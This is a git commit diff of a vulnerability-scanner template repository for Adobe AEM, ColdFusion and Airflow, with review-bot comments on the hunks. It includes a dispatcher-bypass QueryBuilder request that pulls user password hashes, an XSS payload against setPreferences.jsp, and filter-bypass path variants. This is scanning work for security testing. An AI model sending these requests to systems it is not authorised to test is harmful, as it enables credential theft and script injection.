

20240922
actions-user committed Sep 22, 2024
1 parent c815775 commit 4bdd1ad
Showing 1,544 changed files with 22,391 additions and 13,026 deletions.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20240921
20240922
5 changes: 5 additions & 0 deletions poc.txt
Expand Up @@ -26142,6 +26142,7 @@
./poc/cve/CVE-2023-2780.yaml
./poc/cve/CVE-2023-2781-e0e4738fafcd023dcc57e1b2c299faa6.yaml
./poc/cve/CVE-2023-2781.yaml
./poc/cve/CVE-2023-27847.yaml
./poc/cve/CVE-2023-27889-965e16401eed7d13cba5130afd395eb5.yaml
./poc/cve/CVE-2023-27889.yaml
./poc/cve/CVE-2023-27922-18b8524cd7af5c0a0b6b13ec06817981.yaml
Expand Down Expand Up @@ -28167,6 +28168,7 @@
./poc/cve/CVE-2023-3962.yaml
./poc/cve/CVE-2023-3965-8362bc8d4f1e02a8b598a0189ed82be3.yaml
./poc/cve/CVE-2023-3965.yaml
./poc/cve/CVE-2023-39650.yaml
./poc/cve/CVE-2023-39676.yaml
./poc/cve/CVE-2023-39677.yaml
./poc/cve/CVE-2023-39700.yaml
Expand Down Expand Up @@ -38694,6 +38696,7 @@
./poc/cve/CVE-2024-3667.yaml
./poc/cve/CVE-2024-3668-c8ffa38e284a09e692ef63a2e54e8547.yaml
./poc/cve/CVE-2024-3668.yaml
./poc/cve/CVE-2024-36683.yaml
./poc/cve/CVE-2024-3669-5b490dd03c192fb59ee33122e0849596.yaml
./poc/cve/CVE-2024-3669.yaml
./poc/cve/CVE-2024-3670-fec3724139e128cadbd86aa3d4c79b55.yaml
Expand Down Expand Up @@ -42652,6 +42655,7 @@
./poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml
./poc/cve/CVE-2024-7313.yaml
./poc/cve/CVE-2024-7315-fca7053f6d8d3db3a989ec962d9eabd8.yaml
./poc/cve/CVE-2024-7315.yaml
./poc/cve/CVE-2024-7317-ba5a614941cffb6dcbde33c96a783d3e.yaml
./poc/cve/CVE-2024-7317.yaml
./poc/cve/CVE-2024-7349-a333876f0ff61593d79b76123a7c37bd.yaml
Expand Down Expand Up @@ -43005,6 +43009,7 @@
./poc/cve/CVE-2024-8669-48017cad1d0f5431615877a08826da9a.yaml
./poc/cve/CVE-2024-8669.yaml
./poc/cve/CVE-2024-8680-66081216a3685413779cdd14f0f9fe12.yaml
./poc/cve/CVE-2024-8680.yaml
./poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml
./poc/cve/CVE-2024-8714.yaml
./poc/cve/CVE-2024-8724-9019a55c2cb51d14586e3502543ceb09.yaml
6 changes: 1 addition & 5 deletions poc/adobe/adobe-coldfusion-error-detect-86.yaml
Expand Up @@ -5,11 +5,7 @@ info:
author: philippedelteil
severity: info
description: With this template we can detect a running ColdFusion instance due to an error page.
reference:
- https://twitter.com/PhilippeDelteil/status/1418622775829348358
metadata:
verified: true
shodan-query: http.component:"Adobe ColdFusion"
reference: https://twitter.com/PhilippeDelteil/status/1418622775829348358
tags: adobe,coldfusion

requests:
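Review bot: If the `metadata:` block with `verified: true` and `shodan-query: http.component:"Adobe ColdFusion"` is the removed side, as the 1 addition / 5 deletions count suggests, the new file keeps only the single-line `reference:` and loses both the verification marker and the Shodan pivot an operator uses to scope this detection. Consider restoring `metadata:` with `verified: true` and `shodan-query: http.component:"Adobe ColdFusion"` under `info:`, since nothing in the hunk replaces them. The `requests:` block runs past the hunk and was not reviewed.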
3 changes: 1 addition & 2 deletions poc/adobe/adobe-connect-username-exposure-100.yaml
Expand Up @@ -2,10 +2,9 @@ id: adobe-connect-username-exposure

info:
name: Adobe Connect Username Exposure
reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
author: dhiyaneshDk
severity: low
reference:
- https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
tags: adobe,disclosure

requests:
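--- a/poc/adobe/adobe-media-server-115.yaml
+++ b/poc/adobe/adobe-media-server-115.yaml
@@ -1,23 +1,30 @@
-id: adobe-media-server
-
-info:
-name: Adobe Media Server
-author: dhiyaneshDK
-severity: info
-reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
-tags: panel,adobe
-
-requests:
-- method: GET
-path:
-- '{{BaseURL}}'
-
-matchers-condition: and
-matchers:
-- type: word
-words:
-- '<title>Adobe Media Server</title>'
-
-- type: status
-status:
-- 200
+id: adobe-media-server
+
+info:
+name: Adobe Media Server Login Panel
+author: dhiyaneshDK
+severity: info
+description: An Adobe Media Server login panel was detected.
+reference:
+- https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
+- https://helpx.adobe.com/support/adobe-media-server.html
+classification:
+cwe-id: CWE-200
+tags: panel,adobe
+
+requests:
+- method: GET
+path:
+- '{{BaseURL}}'
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- '<title>Adobe Media Server</title>'
+
+- type: status
+status:
+- 200
+
+# Enhanced by mp on 2022/03/20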
15 changes: 13 additions & 2 deletions poc/adobe/aem-default-get-servlet-138.yaml
Expand Up @@ -3,13 +3,24 @@ info:
author: DhiyaneshDk
name: AEM DefaultGetServlet
severity: low
reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
tags: aem
description: Sensitive information might be exposed via AEM DefaultGetServlet.
reference:
- https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
tags: aem,adobe


requests:
- method: GET
path:
- '{{BaseURL}}/etc'
- '{{BaseURL}}/var'
- '{{BaseURL}}/apps'
- '{{BaseURL}}/home'
- '{{BaseURL}}///etc'
- '{{BaseURL}}///var'
- '{{BaseURL}}///apps'
- '{{BaseURL}}///home'
- '{{BaseURL}}/.json'
- '{{BaseURL}}/.1.json'
- '{{BaseURL}}/....4.2.1....json'
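Review bot: The path list now has at least eleven variants (`/etc`, `///etc`, `/.json`, `/....4.2.1....json`, …) and continues past the hunk, but no `stop-at-first-match: true` is visible in the request block; without it every host receives the full set of requests even after the first DefaultGetServlet hit, and each hit is reported as a separate finding. If the part of the request block below the hunk does not already set it, add `stop-at-first-match: true` next to `matchers-condition`. The triple-slash forms are presumably there to slip past dispatcher filters, as the linked burp-aem-scanner `GetServletExposed` check does; that intent is worth a comment above them, e.g. `# '///' variants: dispatcher filter bypass`, so a maintainer does not "normalize" them away. The matchers for this template are outside the hunk and were not reviewed.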
16 changes: 7 additions & 9 deletions poc/adobe/aem-detection.yaml
@@ -1,19 +1,16 @@
id: aem-detection
id: favicon-detection-AEM

info:
name: Favicon based AEM Detection
author: shifacyclewala,hackergautam
name: favicon-detection-AEM (Adobe Experience Manager)
severity: info
reference:
author: shifacyclewala hackergautam
reference: |
- https://twitter.com/brsn76945860/status/1171233054951501824
- https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
metadata:
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,favicon,tech

requests:
- method: GET
path:
Expand All @@ -24,5 +21,6 @@ requests:

matchers:
- type: dsl
name: "Adobe Experience Manager (AEM)"
dsl:
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
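Review bot: On whichever side of this hunk `reference: |` lands (print order suggests the new one), the literal block scalar turns the five `- https://…` lines into a single multi-line string instead of a YAML sequence, so tooling that reads `info.reference` as a list sees one blob with embedded dashes; `reference:` followed by the indented list, as aem-hash-querybuilder and aem-merge-metadata-servlet do in this same commit, keeps it a sequence. The same side writes `author: shifacyclewala hackergautam` where the rest of the corpus uses the comma-separated `author: shifacyclewala,hackergautam`. Together with the mixed-case id `favicon-detection-AEM` and the dropped `metadata.shodan-query`, this looks like an older revision of the upstream template being synced over a newer one; worth confirming the sync source before this lands. The two `status_code==200 && …mmh3…` lines differ only in the trailing newline.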
8 changes: 4 additions & 4 deletions poc/adobe/aem-groovyconsole.yaml
@@ -1,15 +1,15 @@
id: aem-groovyconsole
info:
name: AEM Groovy console exposed
author: d3sca
name: AEM Groovy console enabled
author: twitter.com/Dheerajmadhukar
severity: critical
description: Groovy console is exposed.
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243
tags: aem
requests:
- method: GET
path:
- "{{BaseURL}}/groovyconsole"
- "{{BaseURL}}/groovyconsole.html"
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
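Review bot: The hunk swaps the probe path between `{{BaseURL}}/groovyconsole` and `{{BaseURL}}/groovyconsole.html`; AEM's Sling resolver and dispatcher rules may answer on either form, so keeping one and dropping the other will miss deployments that only serve the other. Keep both entries under `path:` and add `stop-at-first-match: true` beside `matchers-condition` so a hit is reported once. The description `Groovy console is exposed, RCE is possible.` is only true when the console is reachable without authentication; the matchers that decide that are below the hunk and should require a console-page marker rather than a bare 200, which an AEM login page also returns. The `headers:` block and the matchers continue outside the hunk.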
14 changes: 4 additions & 10 deletions poc/adobe/aem-hash-querybuilder.yaml
@@ -1,32 +1,26 @@
id: aem-hash-querybuilder

info:
author: DhiyaneshDk
name: Query hashed password via QueryBuilder Servlet
author: DhiyaneshDk
severity: medium
reference: https://twitter.com/AEMSecurity/status/1372392101829349376
reference:
- https://twitter.com/AEMSecurity/status/1372392101829349376
tags: aem

requests:
- raw:
- |
GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- '"success":true'
- 'rep:password'
condition: and
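Review bot: The `info:` block still has no `description:`, although the request and matchers make the impact concrete: the raw request walks past the dispatcher with `/bin/querybuilder.json.;%0aa.css`, asks for every `rep:User` node with `p.hits=full`, and the template only fires when `rep:password` appears alongside `"success":true`, i.e. password hashes are actually in the body. Add `description: Queries rep:User nodes through the AEM QueryBuilder servlet via a dispatcher bypass (;%0aa.css); a match means rep:password hashes are being returned.` Since the match condition requires hashes in the response, `severity: medium` is arguably low for a disclosure of every user's credential hash — worth checking against the source corpus's severity conventions. Dropping the browser-mimicking headers is fine; nothing in the matchers depends on them.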
2 changes: 1 addition & 1 deletion poc/adobe/aem-jcr-querybuilder-166.yaml
@@ -1,8 +1,8 @@
id: aem-jcr-querybuilder

info:
author: DhiyaneshDk
name: Query JCR role via QueryBuilder Servlet
author: DhiyaneshDk
severity: info
tags: aem

6 changes: 3 additions & 3 deletions poc/adobe/aem-merge-metadata-servlet-172.yaml
@@ -1,13 +1,13 @@
id: aem-merge-metadata-servlet

info:
author: DhiyaneshDk
name: AEM MergeMetadataServlet
author: DhiyaneshDk
severity: info
reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
reference:
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
tags: aem


requests:
- method: GET
path:
24 changes: 20 additions & 4 deletions poc/adobe/aem-querybuilder-json-servlet.yaml
@@ -1,23 +1,39 @@
id: aem-querybuilder-json-servlet

info:
author: DhiyaneshDk
name: AEM QueryBuilder Json Servlet
author: DhiyaneshDk
severity: info
reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
tags: aem

description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet.
reference:
- https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java
tags: aem,adobe

requests:
- method: GET
path:
- '{{BaseURL}}/bin/querybuilder.json'
- '{{BaseURL}}/bin/querybuilder.json.servlet'
- '{{BaseURL}}///bin///querybuilder.json'
- '{{BaseURL}}///bin///querybuilder.json.servlet'
- '{{BaseURL}}/bin/querybuilder.feed'
- '{{BaseURL}}/bin/querybuilder.feed.servlet'
- '{{BaseURL}}///bin///querybuilder.feed'
- ' {{BaseURL}}///bin///querybuilder.feed.servlet'

stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "application/json"
part: header

- type: word
words:
- 'success'
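Review bot: The last path entry, `' {{BaseURL}}///bin///querybuilder.feed.servlet'`, has a space inside the opening quote, so the value begins with a space rather than with `{{BaseURL}}`; nuclei will most likely build a malformed target from it, and that `.feed.servlet` variant silently never gets tested. Drop the space: `- '{{BaseURL}}///bin///querybuilder.feed.servlet'`. With `stop-at-first-match: true` now set the eight paths are otherwise fine, but the `words: - 'success'` matcher at the end of the hunk is a weak token on its own; matching `'"success":true'` as the sibling aem-hash-querybuilder template does would cut false positives from unrelated JSON responses. The matcher block continues past the hunk.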
10 changes: 7 additions & 3 deletions poc/adobe/aem-setpreferences-xss-189.yaml
@@ -1,18 +1,21 @@
id: aem-setpreferences-xss

info:
name: AEM setPreferences - Cross-Site Scripting
name: AEM setPreferences XSS
author: zinminphy0,dhiyaneshDK
severity: medium
reference:
- https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
- https://github.com/projectdiscovery/nuclei-templates/issues/3225
- https://twitter.com/zin_min_phyo/status/1465394815042916352
severity: medium
tags: aem,xss

requests:
- method: GET
path:
- "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
- "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"

stop-at-first-match: true
matchers-condition: and
matchers:
Expand All @@ -21,6 +24,7 @@ requests:
- "<svg/onload=confirm(document.domain);>"
- 'A JSONObject text must begin with'
condition: and

- type: status
status:
- 400
- 400
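Review bot: The matchers confirm the payload only by its reflection (`<svg/onload=confirm(document.domain);>` together with the `A JSONObject text must begin with` error text) and a 400 status, without checking that the error page is served as HTML; if some AEM build returns that body as `text/plain` or JSON the payload is echoed but never executes, and the template reports an XSS that is not exploitable. Adding a header matcher for `text/html` under the existing `matchers-condition: and` ties the finding to a rendered context — assuming the vulnerable error page really is `text/html`, which should be confirmed against a live instance before tightening. The new `/content/crx/de/setPreferences.jsp;%0A.html` path appears to cover dispatcher setups that only expose `/content`; a one-line comment above it saying so would keep it from being pruned as a duplicate. The first matcher is cut by the hunk, and the duplicated `- 400` lines are just the trailing-newline change.
```yaml
    matchers-condition: and
    matchers:
      # … unchanged: reflection matcher and status matcher …
      - type: word
        part: header
        words:
          - "text/html"
```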
3 changes: 3 additions & 0 deletions poc/airflow/airflow-debug.yaml
Expand Up @@ -4,6 +4,9 @@ info:
name: Airflow Debug Trace
author: pdteam
severity: low
metadata:
verified: true
shodan-query: title:"Airflow - DAGs"
tags: apache,airflow,fpd

requests:
